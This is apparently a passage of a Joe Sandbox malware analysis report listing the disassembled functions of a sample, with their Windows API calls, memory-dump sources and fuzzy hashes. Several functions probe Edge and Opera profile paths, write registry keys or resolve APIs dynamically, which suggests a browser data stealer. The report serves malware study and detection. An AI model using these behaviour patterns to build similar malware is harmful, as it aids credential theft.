                                                                                                                                                                                                                                                                                                                              • Instruction ID: f5c5b1796602c674d072fdb72fdb3b9a68742e2cf3b4b57e043f71f885765a41
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15d45520dd525af8553babc3ba79aa9da1bd519a980773528a1e8930c28a5241
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B41DF74D10204EBEB00DFA8DC44BEEB7BAFF44784F60451DF406A7294DB38AA058BA0
                                                                                                                                                                                                                                                                                                                              Function 00404468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92synchronizationnetworkCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(0000028C,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(0000028C,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: EventObjectSingleWaitsend
                                                                                                                                                                                                                                                                                                                              • String ID: LAL
                                                                                                                                                                                                                                                                                                                              • API String ID: 3963590051-3302426157
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 7c758ff3063472b318873a36f1587021102d333a50ed455a36629e6638d962b4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 8f6f307dcfa5e25975ae7096dc57d747427bb4b25c3784bf73346896dbb4b4c1
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c758ff3063472b318873a36f1587021102d333a50ed455a36629e6638d962b4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B82123B29001196BCF04ABA5DC96DEE777CBF54358B00413EF916B21E1EA78AA04D6A4
                                                                                                                                                                                                                                                                                                                              Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                                                                                                              • RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseCreateValue
                                                                                                                                                                                                                                                                                                                              • String ID: TUF
                                                                                                                                                                                                                                                                                                                              • API String ID: 1818849710-3431404234
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                                                                                                                                                                                                                                                              Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3360349984-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 390182afd35e16d175a65701dd8407d599f17f69dcb559d0e745b5afb9433225
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 390182afd35e16d175a65701dd8407d599f17f69dcb559d0e745b5afb9433225
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                                                                                                                                                                                                                                              Function 100046F0 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 1000476A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000ADE3: __CxxThrowException@8.LIBVCRUNTIME ref: 1000ADFA
                                                                                                                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 1000477F
                                                                                                                                                                                                                                                                                                                              • new.LIBCMT ref: 10004785
                                                                                                                                                                                                                                                                                                                              • new.LIBCMT ref: 10004799
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Concurrency::cancel_current_task$Exception@8Throw
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3339364867-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 68b20fe3f0c7c7f050f6ef4f1c12fb3c291c9bfd78cfe9bd81b3364575ba11aa
                                                                                                                                                                                                                                                                                                                              • Instruction ID: b996118a61bf9d45cc2d2cea6005222f19e008b26fe8e61431029879d97c69ca
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68b20fe3f0c7c7f050f6ef4f1c12fb3c291c9bfd78cfe9bd81b3364575ba11aa
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 903106F5A046019FE720CF24D98161AB3E5FB457D0F220B2DE82ACB684DF30E944C7A5
                                                                                                                                                                                                                                                                                                                              Function 0283C7A7 Relevance: 6.1, APIs: 4, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,0283C7DD), ref: 0283C838
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0283C860
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283C7E6: GetModuleHandleA.KERNEL32(0283C7DD), ref: 0283C7E6
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283C7E6: GetProcAddress.KERNEL32(00000000,0283C7F4), ref: 0283C804
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,0283C7F4,0283C7DD), ref: 0283C816
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressHandleModuleProc$ProtectVirtual
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2080333215-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                                                                                                              • Instruction ID: e31a33074359fab808976d6f3b40aa58a709e12286165a1084785c42a21647a0
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE21486E4082816FEB238B784C04BB67FD99B17378F180697D048EB143D7A88656C3F6
                                                                                                                                                                                                                                                                                                                              Function 0283C803 Relevance: 6.1, APIs: 4, Instructions: 54libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,0283C7F4), ref: 0283C804
                                                                                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,0283C7F4,0283C7DD), ref: 0283C816
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,0283C7DD), ref: 0283C838
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0283C860
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressProc$HandleModuleProtectVirtual
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2492872976-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 3280c1e4a783d74de9b03d4bda92dd64c84e1a4f26a37792628cd1b00d997f5d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00F0F04D6892403CFE3356B80C45EBA7FCC8A2B765B141A57E118E7283DAA58706C3F6
                                                                                                                                                                                                                                                                                                                              Function 0041B62A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B657
                                                                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B67C
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041B68A
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3919263394-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 3f34627ebf18732c46889562bde790f52735f321db32931f0b6625c87776b378
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81F0F6B12053047FE6101B21BC85FBF375CDB967A5F00027EFC01A22D1DA658C4591BA
                                                                                                                                                                                                                                                                                                                              Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CountEventTick
                                                                                                                                                                                                                                                                                                                              • String ID: >G
                                                                                                                                                                                                                                                                                                                              • API String ID: 180926312-1296849874
                                                                                                                                                                                                                                                                                                                              • Opcode ID: ee72fe3a6e03fad935ee8c1a846bd386f487a255778e097b66290799a050760f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 080f125417303e5552765b07387c73e695832f87024c8a27cfac38d5c25ddd71
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee72fe3a6e03fad935ee8c1a846bd386f487a255778e097b66290799a050760f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E5191315042409AC224FB71D8A2AEF73E5AFD1314F40853FF94A671E2EF389949C69E
                                                                                                                                                                                                                                                                                                                              Function 10008280 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 10008357
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 10008361
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 909987262-2556327735
                                                                                                                                                                                                                                                                                                                              • Opcode ID: d1227933316caae7ae65396413c237c6ac1f7300808140ee21e47fe7c18da551
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 06a7295eeecc402cdca664894173e78d0fc65afa29d549bafe75b51b0943c357
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1227933316caae7ae65396413c237c6ac1f7300808140ee21e47fe7c18da551
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD213C353047508BE731DE5CA440A5AFBE8FBD1A90B600A6FE5D2C7746C772AB05C7A1
                                                                                                                                                                                                                                                                                                                              Function 10006020 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(-00000002,\AppData\Local\Microsoft\Edge\,0000001E,00000000,-00000002,00000000), ref: 100060BB
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                                              • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                                                                                                                                                                                                                              • API String ID: 1174141254-2800177040
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 11e88317f99a66d0a764e8301f4b6eae45eafd59a93dad38dda7e1d4d615949b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 85e45c25142740e28fbd5dc53a9d8ff5dbe67a4fa6c3c3076d736dc2108dc272
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11e88317f99a66d0a764e8301f4b6eae45eafd59a93dad38dda7e1d4d615949b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4721B575D04204DBDB14DFA8DC05BEFB7F9FF08740F208519E916A3245DB74A6058BA0
                                                                                                                                                                                                                                                                                                                              Function 10006120 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(-00000002,\Opera Software\Opera Stable,0000001C,00000000,-00000002,00000000), ref: 100061BB
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                                              • String ID: AppData$\Opera Software\Opera Stable
                                                                                                                                                                                                                                                                                                                              • API String ID: 1174141254-1162561444
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 75815f275ed3701772f6b4f86ad51967d770cf8f973b4eefbf7867ce21c3a489
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f00d60261ac90b406eef5ab85d6db63d97fc6f89dbef8a3991c81c82add024b3
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75815f275ed3701772f6b4f86ad51967d770cf8f973b4eefbf7867ce21c3a489
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C221D675D04204EBEB14DFA8CC05BEFB7F9FF08780F608519E815A3285DB74A6058BA0
                                                                                                                                                                                                                                                                                                                              Function 100063B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(-00000002,\Microsoft\Edge\Application\msedge.exe,00000026,00000000,-00000002), ref: 1000644B
